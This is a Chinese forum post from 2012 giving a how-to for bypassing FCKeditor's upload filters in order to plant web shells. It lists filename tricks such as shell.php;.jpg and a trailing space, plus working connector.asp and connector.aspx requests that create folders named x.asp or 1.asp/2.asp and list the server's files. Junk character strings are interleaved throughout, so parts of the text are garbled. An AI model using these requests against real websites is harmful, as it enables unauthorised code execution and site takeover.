很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg: Z7 I0 W; i' A& D) n" w
% g) [& @4 o- x( w7 v# ?
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
$ W9 `* n" E6 r" f4 z. h( \& l8 U
7 @6 [7 M: V* |, f& @9 U6 B1 }/ i+ V继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
5 Q, a7 ?" R; d+ x3 N; j& N! C) f6 O m) o: h
突破建立文件夹:9 s/ |- `# N& f l" p6 n. M' Y
# f: c8 }( O( c: C8 O5 ~* A( ^editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
) G4 x1 e Q2 ?4 o1 n! O7 U5 i/ E$ g' I$ D# x$ r& a8 R
参数:% y" Y. l. J, M
& m# G+ s3 R) l0 h0 }# t+ n当前目录名:CurrentFolder=/qing.asp O5 E# W' Q5 q( z$ v* u
# w! L: w; S2 x
新的目录名:NewFolderName=x.asp
' I. g/ j5 d, i4 k' x* X( _3 w: u6 s5 w! m3 K3 m) l6 Q
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……0 s$ s2 \# j2 m& m
$ m: f: {5 _* k1 l# z
那么 x.asp 就已经建立生成了,此方法百试百灵!
7 n' X1 K# v. E3 N# ~
1 Q- m0 a' o) G6 n/ c* g: |新建文件夹参数 x.asp,基本都能搞定。
4 { o5 v( J* M' Z9 K' a' h8 F, W \
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建* d! N1 o+ }+ {
/ a) B E, N0 Z4 z" H8 ]$ `. ^
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
. C$ r) C+ T5 C; J4 J0 K$ g6 P
4 g* ^! l' W+ T4 ~: e获取文件列表
. I( a, [4 W" f% Y1 z, E aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F$ V5 Q; V. f6 [+ D9 K% P+ G
! q( E' Z8 ~; `# H+ D' K( x
|
发表于 2012-12-31 09:27:09
收藏
支持
反对